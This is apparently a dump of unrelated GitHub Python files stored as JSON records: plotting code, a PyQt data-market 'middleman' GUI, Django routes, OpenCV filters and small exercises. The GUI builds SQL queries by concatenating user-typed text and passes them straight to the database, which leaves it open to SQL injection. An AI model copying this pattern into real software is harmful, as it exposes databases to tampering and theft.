max(trialIndexForEachSpike)*stimLineOffsetFrac\naxACLaserRaster.plot([0, 0.1], [acLaserLineY, acLaserLineY], lw=stimLineWidth, color=colorLaser,\n clip_on=False)\n\nspikeCountMat = spikesanalysis.spiketimes_to_spikecounts(spikeTimesFromEventOnset,\n indexLimitsEachTrial, binEdges)\nthisPSTH = np.mean(spikeCountMat,axis=0)\nif smoothPSTH:\n thisPSTH = np.convolve(thisPSTH, winShape, mode='same')\nratePSTH = thisPSTH/float(binsize/1000.0)\naxACLaserPSTH.plot(psthTimeBase, ratePSTH, '-',\n color=colorPSTH, lw=psthLineWidth)\naxACLaserPSTH.set_xlim(displayRange)\nextraplots.boxoff(axACLaserPSTH)\naxACLaserPSTH.set_ylim([0, max(ratePSTH)])\naxACLaserPSTH.set_yticks([0, np.floor(np.max(ratePSTH))])\naxACLaserPSTH.set_ylabel('spk/s', fontsize=fontSizeLabels)\naxACLaserPSTH.set_xlabel('Time (s)', fontsize=fontSizeLabels, labelpad=-8)\naxACLaserPSTH.set_xticks([0, 0.3])\nextraplots.set_ticks_fontsize(axACLaserPSTH, fontSizeTicks)\n\n\n\naxACLaserPSTH.annotate('A', xy=(labelPosX[0],labelPosY[1]), xycoords='figure fraction',\n fontsize=fontSizePanel, fontweight='bold')\naxACLaserPSTH.annotate('B', xy=(labelPosX[1],labelPosY[1]), xycoords='figure fraction',\n fontsize=fontSizePanel, fontweight='bold')\naxACLaserPSTH.annotate('C', xy=(labelPosX[2],labelPosY[1]), xycoords='figure fraction',\n fontsize=fontSizePanel, fontweight='bold')\naxACLaserPSTH.annotate('D', xy=(labelPosX[0],labelPosY[0]), xycoords='figure fraction',\n fontsize=fontSizePanel, fontweight='bold')\naxACLaserPSTH.annotate('E', xy=(labelPosX[1],labelPosY[0]), xycoords='figure fraction',\n fontsize=fontSizePanel, fontweight='bold')\naxACLaserPSTH.annotate('F', xy=(labelPosX[2],labelPosY[0]), xycoords='figure fraction',\n fontsize=fontSizePanel, fontweight='bold')\n\nif SAVE_FIGURE:\n extraplots.save_figure(figFilename, figFormat, figSize, outputDir)\n\nplt.show()\n\n","repo_name":"sjara/jaratest","sub_path":"common/2018thstr/figure_example_noise_laser.py","file_name":"figure_example_noise_laser.py","file_ext":"py","file_size_in_byte":12520,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"25460671087","text":"#coding = 'utf-8'\n\nfrom database_funs import * #数据库有关操作函数\nfrom vertical_federated_learning import * #垂直联邦学习有关函数\nfrom horizonal_federated_learning import * #水平联邦学习有关函数\n\nfrom PyQt5.QtWidgets import QPlainTextEdit, QFileDialog, QButtonGroup, QInputDialog, QLabel, QWidget, QPushButton, QApplication, QHBoxLayout, QVBoxLayout, QDialog, QLineEdit, QMessageBox, QTableWidget, QAction, QTableWidgetItem, QRadioButton\nfrom PyQt5.QtGui import QFont, QPalette, QPixmap, QBrush, QIcon\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.Qt import *\nimport pandas as pd\nimport numpy as np\n\n#文件路径大合集\nICON_PATH = './images/bg_son.jpg'\nWELCOME_BG_PATH = \"./images/bg_son.jpg\"\n\n##中间商界面################################################################################################################################\nclass Window_Middleman_Main(QDialog):\n def __init__(self):\n super().__init__()\n #获取屏幕分辨率\n self.desktop = QApplication.desktop()\n self.screenRect = self.desktop.screenGeometry()\n #设置窗口大小\n self.HEIGHT = int(self.screenRect.height() * 0.6)\n self.WIDTH = int(self.screenRect.width() * 0.6)\n self.TOP = int(self.screenRect.height() * 0.2)\n self.LEFT = int(self.screenRect.width() * 0.2)\n #从上一级窗口继承的变量\n self.middleman_id = None\n self.current_ontable = 'None'\n #设置该窗口元素\n self.Init_UI()\n\n def Init_UI(self):\n #窗口设置\n self.setGeometry(self.LEFT, self.TOP, self.WIDTH, self.HEIGHT) \n self.setWindowTitle('MiniDTM_Middleman')\n self.setWindowIcon(QIcon(ICON_PATH))\n #背景图片\n palette = QPalette()\n pix=QPixmap(WELCOME_BG_PATH)\n pix = pix.scaled(self.width(),self.height())\n palette.setBrush(QPalette.Background, QBrush(pix))\n self.setPalette(palette)\n #顶部综合显示框\n self.label_table_alldatas = QLabel(self)\n self.label_table_alldatas.setText(\"Current ontable is: \" + str(self.current_ontable))\n self.label_table_alldatas.setStyleSheet(\"color: cornsilk\")\n self.label_table_alldatas.setAlignment(Qt.AlignCenter)\n font_label_table_alldatas = QFont()\n font_label_table_alldatas.setPointSize(12)\n font_label_table_alldatas.setBold(True)\n self.label_table_alldatas.setFont(font_label_table_alldatas)\n self.table_alldatas = QTableWidget(self)\n #1 原始数据集-数据包部分\n #标题\n self.label_integrate2pkg = QLabel(self)\n self.label_integrate2pkg.setText(\"Intergrate Rawdatas to Datapkgs\")\n self.label_integrate2pkg.setStyleSheet(\"color: cornsilk\")\n self.label_integrate2pkg.setAlignment(Qt.AlignCenter)\n font_label_integrate2pkg = QFont()\n font_label_integrate2pkg.setPointSize(12)\n font_label_integrate2pkg.setBold(True)\n self.label_integrate2pkg.setFont(font_label_integrate2pkg)\n #输入框与按钮\n self.bt_show_rawdatas = QPushButton('Show Rawdatas', self)\n self.bt_show_rawdatas.clicked.connect(self.show_rawdatas)\n self.bt_integrate2pkg = QPushButton('Intergrate Rawdatas', self)\n self.bt_integrate2pkg.clicked.connect(self.integrate2pkg)\n #2 模型训练部分\n #标题\n self.label_federated_learning = QLabel(self)\n self.label_federated_learning.setText(\"Federated_Learning\")\n self.label_federated_learning.setStyleSheet(\"color: cornsilk\")\n self.label_federated_learning.setAlignment(Qt.AlignCenter)\n font_label_federated_learning = QFont()\n font_label_federated_learning.setPointSize(12)\n font_label_federated_learning.setBold(True)\n self.label_federated_learning.setFont(font_label_federated_learning)\n #输入框与按钮\n self.bt_show_modelsets = QPushButton('Show Modelsets', self)\n self.bt_show_modelsets.clicked.connect(self.show_modelsets)\n self.bt_horizontal_federated_learning = QPushButton('Horizontal Federated Learning', self)\n self.bt_horizontal_federated_learning.clicked.connect(self.horizontal_federated_learning)\n self.bt_vertical_federated_learning = QPushButton('Vertical Federated Learning', self)\n self.bt_vertical_federated_learning.clicked.connect(self.vertical_federated_learning)\n #3 数据查询部分\n #标题\n self.label_query = QLabel(self)\n self.label_query.setText(\"Data Query\")\n self.label_query.setStyleSheet(\"color: cornsilk\")\n self.label_query.setAlignment(Qt.AlignCenter)\n font_label_query = QFont()\n font_label_query.setPointSize(12)\n font_label_query.setBold(True)\n self.label_query.setFont(font_label_query)\n #输入框与按钮\n self.bt_show_querysets = QPushButton('Show Querysets', self)\n self.bt_show_querysets.clicked.connect(self.show_querysets)\n self.lineedit_queryset_name = QLineEdit(self)\n self.lineedit_queryset_name.setPlaceholderText(\"input queryset name here\")\n self.lineedit_queryset_condition = QLineEdit(self)\n self.lineedit_queryset_condition.setPlaceholderText(\"input fliter condition here\")\n self.bt_query = QPushButton('Query', self)\n self.bt_query.clicked.connect(self.query_datas)\n self.bt_release_dataservice = QPushButton('Release', self)\n self.bt_release_dataservice.clicked.connect(self.release_dataservice)\n #4 竞价处理部分\n #标题\n self.label_biddings = QLabel(self)\n self.label_biddings.setText(\"Biddings\")\n self.label_biddings.setStyleSheet(\"color: cornsilk\")\n self.label_biddings.setAlignment(Qt.AlignCenter)\n font_label_biddings = QFont()\n font_label_biddings.setPointSize(12)\n font_label_biddings.setBold(True)\n self.label_biddings.setFont(font_label_biddings)\n #输入框与按钮\n self.bt_show_biddings = QPushButton('Show Biddings', self)\n self.bt_show_biddings.clicked.connect(self.show_biddings)\n self.lineedit_datapkg_id = QLineEdit(self)\n self.lineedit_datapkg_id.setPlaceholderText(\"input bidding datapkg id\")\n self.bt_dealing_bidding = QPushButton('Deal With Bidding', self)\n self.bt_dealing_bidding.clicked.connect(self.dealing_bidding)\n #显示布局设置\n vbox = QVBoxLayout()\n #0 顶部综合框\n vbox.addWidget(self.label_table_alldatas)\n vbox.addWidget(self.table_alldatas)\n #1 原始数据区\n vbox.addWidget(self.label_integrate2pkg)\n hbox1 = QHBoxLayout()\n hbox1.addStretch(1)\n hbox1.addWidget(self.bt_show_rawdatas)\n hbox1.addWidget(self.bt_integrate2pkg)\n hbox1.addStretch(1)\n vbox.addLayout(hbox1)\n #2 模型训练区\n vbox.addWidget(self.label_federated_learning)\n hbox2 = QHBoxLayout()\n hbox2.addStretch(1)\n hbox2.addWidget(self.bt_show_modelsets)\n hbox2.addWidget(self.bt_horizontal_federated_learning)\n hbox2.addWidget(self.bt_vertical_federated_learning)\n hbox2.addStretch(1)\n vbox.addLayout(hbox2)\n #3 数据查询部分\n vbox.addWidget(self.label_query)\n hbox3 = QHBoxLayout()\n hbox3.addStretch(1)\n hbox3.addWidget(self.bt_show_querysets)\n hbox3.addWidget(self.lineedit_queryset_name)\n hbox3.addWidget(self.lineedit_queryset_condition)\n hbox3.addWidget(self.bt_query)\n hbox3.addWidget(self.bt_release_dataservice)\n hbox3.addStretch(1)\n vbox.addLayout(hbox3)\n #4 竞价处理部分\n vbox.addWidget(self.label_biddings)\n hbox4 = QHBoxLayout()\n hbox4.addStretch(1)\n hbox4.addWidget(self.bt_show_biddings)\n hbox4.addWidget(self.lineedit_datapkg_id)\n hbox4.addWidget(self.bt_dealing_bidding)\n hbox4.addStretch(1)\n vbox.addLayout(hbox4)\n #完成\n self.setLayout(vbox)\n self.show()\n \n #整合数据集打包部分函数*****************************************************************************************************************\n \n #表格显示原始数据集\n def show_rawdatas(self):\n cols = db_get_col_list('rawdatas') #设置列\n self.table_alldatas.setColumnCount(len(cols)) \n self.table_alldatas.setHorizontalHeaderLabels(cols[:len(cols)]) #设置表头\n datas = db_get_table_datas('rawdatas') #设置行\n self.flash_table_datas(self.table_alldatas, datas) #根据取得的数据刷新表中内容\n self.current_ontable = 'rawdatas'\n\n #整合原始数据集为数据包,并进行区分定价发布\n def integrate2pkg(self):\n #弹窗填写数据集名,若有多个则以;来分割\n text, ok = QInputDialog.getText(self, 'Input Rawdatas Name', 'Divided by ;')\n if(ok):\n if(text==''): #如果为空\n QMessageBox.warning(self, \"warning\", \"No input!\")\n return 1\n else:\n rawdatas_list = text.split(\";\")\n print(rawdatas_list)\n #确保数据库中有所输入的数据集名\n all_names = []\n datas = db_get_table_datas('rawdatas')\n for item in datas:\n all_names.append(item['name'])\n for name in rawdatas_list:\n if(name not in all_names):\n QMessageBox.warning(self, \"warning\", \"rawdatas not found!\")\n return 1\n #弹窗命名数据包,输入整合后size和accuracy\n #输入完整数据集定价,然后自动生成n份出价\n #发布,同步到数据库\n #为避免反复弹窗,这些全部在子窗口中完成\n window_middleman_sub = Window_Middleman_Sub()\n window_middleman_sub.middleman_id = self.middleman_id\n window_middleman_sub.exec()\n \n #模型训练部分函数*****************************************************************************************************************\n \n #表格显示训练数据\n def show_modelsets(self):\n cols = db_get_col_list('modelsets') #设置列\n self.table_alldatas.setColumnCount(len(cols)) \n self.table_alldatas.setHorizontalHeaderLabels(cols[:len(cols)]) #设置表头\n datas = db_get_table_datas('modelsets') #设置行\n self.flash_table_datas(self.table_alldatas, datas) #根据取得的数据刷新表中内容\n self.current_ontable = 'modelsets'\n\n #垂直联邦学习\n def vertical_federated_learning(self):\n #获取文件路径\n res = db_get_table_datas_with_constraint('modelsets','model_mode = \\'vertical\\'')\n file_list = []\n for item in res:\n file_list.append(item['file_path'])\n #启动垂直联邦学习\n learning_result = fun_vertical_federated_learning(file_list)\n #显示结果\n QMessageBox.information(self, \"Learning Completed!\", \"The final model accuracy is \"+str(learning_result))\n\n #水平联邦学习\n def horizontal_federated_learning(self):\n #获取文件路径\n res = db_get_table_datas_with_constraint('modelsets','model_mode = \\'horizonal\\'')\n file_list = []\n for item in res:\n file_list.append(item['file_path'])\n print(\"file_list=\",file_list)\n #启动水平联邦学习\n final_score, real_contribution = horizontal_federated_learning(file_list)\n print('done')\n #显示结果\n showcase_str = 'The final score is ' + str(final_score) + '. '\n for i in range(len(real_contribution)):\n showcase_str += 'The contribution of member ' + str(i) + ' is ' + str(real_contribution[i]) + '. '\n QMessageBox.information(self, \"Learning Completed!\", showcase_str)\n\n\n #数据查询部分函数*****************************************************************************************************************\n\n #表格显示训练数据\n def show_querysets(self):\n cols = db_get_col_list('querysets') #设置列\n self.table_alldatas.setColumnCount(len(cols)) \n self.table_alldatas.setHorizontalHeaderLabels(cols[:len(cols)]) #设置表头\n datas = db_get_table_datas('querysets') #设置行\n self.flash_table_datas(self.table_alldatas, datas) #根据取得的数据刷新表中内容\n self.current_ontable = 'querysets'\n\n #数据查询服务函数\n def query_datas(self):\n #获取并检查输入\n queryset_name = self.lineedit_queryset_name.text()\n queryset_condition = self.lineedit_queryset_condition.text()\n if(queryset_name=='' or queryset_condition==''):\n QMessageBox.warning(self, \"warning\", \"Incomplete Input!\")\n return 1\n #从db中获取数据\n self.query_result = db_get_table_datas_with_constraint(queryset_name, queryset_condition)\n #弹窗提示价格\n info = db_get_table_datas_with_constraint('querysets', 'name = \\'' + queryset_name + '\\'')\n price = int(info[0]['price']) * len(self.query_result)\n QMessageBox.warning(self, \"warning\", \"This Query Service Need \"+str(price)+'!')\n #显示到表上\n cols = db_get_col_list(queryset_name) #设置列\n self.table_alldatas.setColumnCount(len(cols)) \n self.table_alldatas.setHorizontalHeaderLabels(cols[:len(cols)]) \n self.flash_table_datas(self.table_alldatas, self.query_result) #根据取得的数据刷新表中内容\n \n #将查询到的数据发布成产品,弹窗输入产品信息\n def release_dataservice(self):\n if(len(self.query_result) < 1):\n QMessageBox.warning(self, \"warning\", \"No query info!\")\n return 1\n #弹窗输入价格\n Float, ok = QInputDialog.getDouble(self, 'Input Info', 'Input price here (0~1)', 0.8, 0, 1, 2)\n if(ok):\n price = Float\n #发布到数据库\n row_list = ['price', 'middleman']\n value_list = [str(price), self.middleman_id]\n db_add_one_row('market_dataservice', row_list, value_list)\n QMessageBox.information(self, \"notion\", 'successfully released!')\n\n \n #处理拍卖竞价部分函数*****************************************************************************************************************\n\n #表格显示竞价数据\n def show_biddings(self):\n cols = db_get_col_list('bidding') #设置列\n self.table_alldatas.setColumnCount(len(cols)) \n self.table_alldatas.setHorizontalHeaderLabels(cols[:len(cols)]) #设置表头\n datas = db_get_table_datas('bidding') #设置行\n self.flash_table_datas(self.table_alldatas, datas) #根据取得的数据刷新表中内容\n self.current_ontable = 'bidding'\n\n #处理竞价\n def dealing_bidding(self):\n #获取并检查输入\n datapkg_id = self.lineedit_datapkg_id.text()\n if(datapkg_id==''):\n QMessageBox.warning(self, \"warning\", \"Incomplete Input!\")\n return 1\n #弹窗输入保留阈值\n Int, ok = QInputDialog.getInt(self, 'Input Info', 'Input reserve bar', 1024, 1, 10000000)\n if(ok):\n reserve_bar = Int\n #获取所有的出价\n bidding_result = db_get_table_datas_with_constraint('bidding','datapkg_id = '+datapkg_id)\n #判断是否达到条件\n price_list = []\n for i in range(len(bidding_result)):\n price_list.append(bidding_result[i]['price'])\n max2 = np.sort(price_list)[-2]\n max1 = np.sort(price_list)[-1]\n if(max2>max1-reserve_bar): #达到条件,将产品卖出\n #在market_datapkg中清除商品\n db = connect2db()\n cursor = db.cursor()\n sql = 'delete from market_dataproduct where id = %s' % datapkg_id\n cursor.execute(sql)\n db.commit()\n cursor.close()\n db.close()\n print(\"qing chu cheng gong\")\n #在history中加入记录\n for i in range(len(bidding_result)):\n if(bidding_result[i]['price'] == max2):\n buyer = bidding_result[i]['buyer_id']\n row_list = ['name', 'price', 'buyer', 'middleman'] #name这列用datapkg_id代替\n value_list = [datapkg_id, str(max2), buyer, self.middleman_id]\n db_add_one_row('history', row_list, value_list)\n print(\"tian jia cheng gong\")\n #弹窗提示拍卖成功,成交价与拍得者\n QMessageBox.information(self, \"notion\", 'successfully sold! buyer is '+buyer+', price is '+str(max2))\n else: #未到条件,在market_datapkg中更新last_price\n db = connect2db()\n cursor = db.cursor()\n sql = 'update market_datapkg set lastprice = ' + str(max1-reserve_bar) + ' where id = \\'' + datapkg_id +'\\''\n print(\"sql=\",sql)\n cursor.execute(sql)\n print('success')\n db.commit()\n cursor.close()\n db.close()\n #弹窗提示拍卖未成功\n QMessageBox.information(self, \"notion\", 'bidding failed. Last price is ' + str(max1-reserve_bar))\n #无论有没有卖出,都在bidding中清除出价记录\n db = connect2db()\n cursor = db.cursor()\n sql = 'delete from bidding where datapkg_id = \\'' + datapkg_id +'\\''\n cursor.execute(sql)\n db.commit()\n cursor.close()\n db.close()\n print(\"all done\")\n #还要刷新表格显示\n self.show_biddings()\n\n #其他通用处理部分函数******************************************************************************************************************\n\n #来自buyer\n # 根据表头,自动从全表数据中截取所需字段显示在表上\n def flash_table_datas(self, TableWidget, datas):\n TableWidget.setRowCount(len(datas))\n attributes = []\n for i in range(TableWidget.columnCount()):\n attributes.append(TableWidget.horizontalHeaderItem(i).text())\n for i in range(len(datas)):\n pos = 0\n for attribute in attributes:\n TableWidget.setItem(i,pos,QTableWidgetItem(str(datas[i][attribute]))) \n pos += 1 \n\n #来自seller\n #根据按格式排列的lines更新顶部数据显示表格\n def flash_table_datas_from_format_lines(self, TableWidget, datas, dimension=2):\n TableWidget.setRowCount(len(datas))\n if(dimension==2):\n for i in range(len(datas)):\n for j in range(len(datas[0])):\n TableWidget.setItem(i, j, QTableWidgetItem(datas[i][j]))\n elif(dimension==1):\n for i in range(len(datas)):\n TableWidget.setItem(i, 0, QTableWidgetItem(datas[i]))\n\n #上传文件成为列表\n def upload_file_into_lines(self, split_str=None):\n fname = QFileDialog.getOpenFileName(self, 'Openning File','./')\n format_lines = []\n format_header = []\n if fname[0]:\n #如果是.csv文件,就认为是有表头的,如果是.txt文件,就认为是没表头的,自动生成表头\n if (\".txt\" in fname[0]):\n with open(fname[0], 'r',encoding='gb18030',errors='ignore') as f: \n flines = f.read().splitlines()\n for line in flines:\n if(split_str==None):\n format_line = line\n elif(split_str==\" \"):\n format_line = line.split()\n else:\n format_line = line.strip().split(split_str)\n format_lines.append(format_line)\n #自动按数字生成表头\n if(split_str==None):\n format_header=['0']\n else:\n for i in range(0,len(format_lines[0])): #自动按数字生成表头\n format_header.append(str(i))\n elif (\".csv\" in fname[0]):\n with open(fname[0], 'r', errors='ignore') as f: \n #with open(fname[0], 'r',encoding='gb18030',errors='ignore') as f: \n flines = f.read().splitlines()\n for i in range(len(flines)):\n if i == 0:\n if(split_str==None):\n format_header = flines[0]\n elif(split_str==\" \"):\n format_header = flines[0].split() \n else:\n format_header = flines[0].strip().split(split_str) \n else:\n if(split_str==None):\n format_line = flines[i]\n elif(split_str==\" \"):\n format_line = flines[i].split() \n else:\n format_line = flines[i].strip().split(split_str)\n format_lines.append(format_line) \n else:\n QMessageBox.warning(self, \"warning\", \"unsupported format!\")\n return format_header, format_lines, fname[0]\n \n #将format_lines中每行字段内容长度对齐\n def align_lines(self, lines):\n max_len = len(lines[0])\n for line in lines:\n if(len(line) > max_len):\n max_len = len(line)\n for i in range(len(lines)):\n for j in range(len(lines[i]), max_len):\n lines[i].append(\"\") #用空字符串来填充\n return lines\n\n\n##发布datapkg页面###########################################################################################################################\nclass Window_Middleman_Sub(QDialog):\n def __init__(self):\n super().__init__()\n #获取屏幕分辨率\n self.desktop = QApplication.desktop()\n self.screenRect = self.desktop.screenGeometry()\n #设置窗口大小\n self.HEIGHT = int(self.screenRect.height() * 0.4)\n self.WIDTH = int(self.screenRect.width() * 0.4)\n self.TOP = int(self.screenRect.height() * 0.3)\n self.LEFT = int(self.screenRect.width() * 0.3)\n #从上一级窗口继承的变量\n self.middleman_id = None\n #设置该窗口元素\n self.Init_UI()\n\n def Init_UI(self):\n #窗口设置\n self.setGeometry(self.LEFT, self.TOP, self.WIDTH, self.HEIGHT) \n self.setWindowTitle('MiniDTM_Middleman_ReleasePkgs')\n self.setWindowIcon(QIcon(ICON_PATH))\n #背景图片\n palette = QPalette()\n pix=QPixmap(WELCOME_BG_PATH)\n pix = pix.scaled(self.width(),self.height())\n palette.setBrush(QPalette.Background, QBrush(pix))\n self.setPalette(palette)\n #name、accuracy、size、price、partition输入框,生成按钮\n self.lineedit_name = QLineEdit(self)\n self.lineedit_name.setPlaceholderText(\"input name here\")\n self.lineedit_accuracy = QLineEdit(self)\n self.lineedit_accuracy.setPlaceholderText(\"input accuracy here\")\n self.lineedit_size = QLineEdit(self)\n self.lineedit_size.setPlaceholderText(\"input size here\")\n self.lineedit_price = QLineEdit(self)\n self.lineedit_price.setPlaceholderText(\"input price here\")\n self.lineedit_partition = QLineEdit(self)\n self.lineedit_partition.setPlaceholderText(\"input partition here\")\n self.bt_divide = QPushButton(\"Divide into sub pkgs\", self)\n self.bt_divide.clicked.connect(self.divide_datapkg)\n #显示拆分结果与确定发布按钮\n self.lineedit_part1 = QLineEdit(self)\n self.lineedit_part2 = QLineEdit(self)\n self.lineedit_part3 = QLineEdit(self)\n self.lineedit_part4 = QLineEdit(self)\n self.lineedit_part5 = QLineEdit(self)\n self.bt_release_pkgs = QPushButton(\"Release Packages\", self)\n self.bt_release_pkgs.clicked.connect(self.release_pkgs)\n #显示布局\n vbox = QVBoxLayout()\n hbox1 = QHBoxLayout()\n hbox1.addWidget(self.lineedit_name)\n hbox1.addWidget(self.lineedit_accuracy)\n hbox1.addWidget(self.lineedit_size)\n vbox.addLayout(hbox1)\n hbox2 = QHBoxLayout()\n hbox2.addWidget(self.lineedit_price)\n hbox2.addWidget(self.lineedit_partition)\n hbox2.addWidget(self.bt_divide)\n vbox.addLayout(hbox2)\n vbox.addWidget(self.lineedit_part1)\n vbox.addWidget(self.lineedit_part2)\n vbox.addWidget(self.lineedit_part3)\n vbox.addWidget(self.lineedit_part4)\n vbox.addWidget(self.lineedit_part5)\n vbox.addWidget(self.bt_release_pkgs)\n self.setLayout(vbox)\n self.show()\n \n #自动拆分成小份的\n def divide_datapkg(self):\n #检查输入\n self.lineedit_list = [self.lineedit_name, self.lineedit_accuracy, self.lineedit_size, self.lineedit_price, self.lineedit_partition]\n for lineedit in self.lineedit_list:\n if lineedit.text() == '':\n QMessageBox.warning(self, \"warning\", \"invalid input\")\n return 1\n #生成分布\n self.partition = []\n for i in range(0, min(int(self.lineedit_partition.text()), 5)): #最多生成5组\n accuracy = np.random.random() * float(self.lineedit_accuracy.text())\n size = np.random.random() * int(self.lineedit_accuracy.text())\n how_big = (size*accuracy) / (int(self.lineedit_accuracy.text())*float(self.lineedit_accuracy.text()))\n balance = -0.25*pow(how_big,2) + 2*how_big +0.25\n price = ( balance * float(self.lineedit_price.text()) )\n item = {'accuracy':accuracy, 'size':size, 'price':price}\n self.partition.append(item)\n #显示分布\n self.lineedit_partition_list = [self.lineedit_part1, self.lineedit_part2, self.lineedit_part3, self.lineedit_part4, self.lineedit_part5]\n for i in range(len(self.lineedit_partition_list)):\n self.lineedit_partition_list[i].setText('accuracy:'+str(self.partition[i]['accuracy'])+' size:'+str(self.partition[i]['size'])+' price:'+str(self.partition[i]['price']))\n \n #发布数据包们\n def release_pkgs(self):\n row_list = ['name', 'size', 'accuracy', 'lastprice']\n for i in range(len(self.lineedit_partition_list)):\n valuelist = [str(self.lineedit_name.text())+'_'+str(i), str(self.partition[i]['size']), str(self.partition[i]['accuracy']), str(self.partition[i]['price'])]\n db_add_one_row('market_datapkg', row_list, valuelist)\n print(\"release success\")\n self.close()","repo_name":"FlyTweety/MiniDTM","sub_path":"window_middleman.py","file_name":"window_middleman.py","file_ext":"py","file_size_in_byte":26867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26728231433","text":"numbers = [1, 2, 3]\nstrings = ['hello', 'world']\nnames = [\"John\", \"Eric\", \"Jessica\"]\n\n# write your code here\nsecond_name = names[1]\n\n\n# this code should write out the filled arrays and the second name in the names list (Eric).\nprint(numbers)\nprint(strings)\nprint(\"The second name on the names list is %s\\n\" % second_name)\n\nrandom_text = \"It,h gIi nl ievhet afmoo nsge rtuhtea ecr\"\n\nprint(random_text[::2] + random_text[::-2])\n\njust_list = [1, 2, 3, 5, 8, 13, 21, 34, 55]\nprint(*just_list)\n\n\ndef recursion(nums):\n if isinstance(nums, int):\n print(f'{\" \"*(len(just_list) + 1)}{nums}')\n return\n elif not nums:\n return\n\n if len(nums) == 3:\n first, middle, last = nums\n else:\n first, *middle, last = nums\n print(f'{\" \" * (len(just_list) - len(nums))}{first}{\" \"*(len(nums)*2)}{last}')\n return recursion(middle)\n\n\nrecursion(just_list)\n","repo_name":"Dispoison/python-education","sub_path":"python/python-basics/lists.py","file_name":"lists.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25709712","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.home,name='home'),\n path('posts/', views.posting, name='posting'),\n path('viewpost/', views.viewpost,name='viewpost'),\n path('addpost', views.addpost,name='addpost'),\n path('delete/', views.deleteblog,name='delete'),\n path('register/',views.registerpage,name='register'),\n path('login/', views.loginpage,name='login'),\n path('logout/',views.logoutpage,name='logout'),\n path('login1/',views.loggin,name='loggin'),\n path('homee/', views.homee,name='homee'),\n \n]","repo_name":"AJTopisano/food-waste-management","sub_path":"uploader/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"74506114408","text":"import struct\r\nfrom PIL import Image\r\n\r\ndef binary_to_image(inputPath, width, height, outputPath):\r\n with open(inputPath, 'rb') as f:\r\n binary_data = f.read()\r\n\r\n pixel_data = []\r\n for i in range(0, len(binary_data), 2):\r\n # Read two bytes from the binary data\r\n pixel = struct.unpack('> 8) & 0xF\r\n g = (pixel >> 4) & 0xF\r\n b = pixel & 0xF\r\n\r\n # Scale the 4-bit components to 8-bit range (0-255)\r\n r = r * 17\r\n g = g * 17\r\n b = b * 17\r\n\r\n pixel_data.append((r, g, b))\r\n\r\n try:\r\n image = Image.new('RGB', (width, height))\r\n image.putdata(pixel_data)\r\n image.save(outputPath, 'PNG')\r\n except Exception as e:\r\n print(e)","repo_name":"xpawelsky/TheNationsDecompressor","sub_path":"bin2img.py","file_name":"bin2img.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10909874734","text":"import cv2\nimport numpy as np\n\nboat = cv2.imread('FishingBoat.jpg')\n\nrows, cols =boat.shape[:2]\n\n#Vignette Filter \n\n#Kernal Mask\nkernel_x=cv2.getGaussianKernel(int(1.4*cols),400)\nkernel_y=cv2.getGaussianKernel(int(1.4*rows),250)\nkernel = kernel_y*kernel_x.T\nmask = 255*kernel / np.linalg.norm(kernel)\nmask=mask[int(0*rows):int(1.0*rows),int(0.4*cols):]\n\noutput_vignette =np.copy(boat)\n\n#Appyling mask to all channels of image\nfor i in range(3):\n\toutput_vignette[:,:,i] = output_vignette[:,:,i]*mask\ncv2.imshow('Original',boat)\ncv2.imshow('Vignette',output_vignette)\n\ncv2.imwrite('Focus_on_boat.jpg',output_vignette)\n\n#Contrast equilizer-Grayscale\n\noutput_vignette_gray=cv2.cvtColor(output_vignette,cv2.COLOR_BGR2GRAY)\n\nhisteq = cv2.equalizeHist(output_vignette_gray)\n\ncv2.imshow('Gray-vignette',output_vignette_gray)\ncv2.imshow('Vignette Equalised',histeq)\n\n\ncv2.imwrite('Focus_on_boat_equalised_gray.jpg',histeq )\n\n#Contrast equilizer - YUV\n\nboat_yuv=cv2.cvtColor(boat,cv2.COLOR_BGR2YUV)\n\n#Equlaize intensitu=y value\nboat_yuv[:,:,0] = cv2.equalizeHist(boat_yuv[:,:,0])\n\noutput_equalized_boat =cv2.cvtColor(boat_yuv, cv2.COLOR_YUV2BGR)\n\ncv2.imshow('Equalized Vignette Boat',output_equalized_boat)\ncv2.imwrite('Equalized_Vignette_Boat.jpg',output_equalized_boat)\n\ncv2.waitKey(0)\n\ncv2.destroyAllwindows()\n","repo_name":"chainspark/OpenCv_Applications","sub_path":"Convolution/Vignette Filter.py","file_name":"Vignette Filter.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27372451466","text":"# Обьявляем функцию для подсчета\n\ndef counter(n_customers):\n adder = 0 # для суммирования цифр\n\n '''В словарь list_of_groups записывается сколько человек в каждой группе.\n Пример: {1: 3}. Это значит в 1 группе 3 человек. \n Такой способ облегчает дальнейшее использование кода\n т.к. через словарь легче работать с выводами данных \n или преобразовать в Json файл'''\n list_of_groups = {0 : 0} \n\n # Цикл для суммирования чисел\n for i in list(str(n_customers)):\n adder += int(i)\n\n # Переменная sum содержит сумму цифр(Группу)\n sum = adder\n \n # Проверяем есть ли это число в списке(Есть ли такая группа вообще?)\n if sum in list_of_groups:\n # Если такая группа есть, тогда делаем +1 клиент в эту группу\n list_of_groups[sum] += 1\n \n else:\n # Если такой группы нет, тогда расширяем словарь и в значение передаем !\n new_group = {sum : 1}\n list_of_groups.update(new_group)\n \n return list_of_groups\n\n# Вызываем функцию\ncounter(\"Some values\")","repo_name":"bekarysibrashev/Task-for-recruiter-","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38648240132","text":"\r\nimport os\r\nimport sys\r\nos.environ[\"FLAGS_allocator_strategy\"] = 'auto_growth'\r\nos.environ[\"KMP_DUPLICATE_LIB_OK\"]=\"TRUE\"\r\nsys.path.append(\"..\\\\..\\\\\")\r\n\r\nimport cv2\r\nimport copy\r\nimport 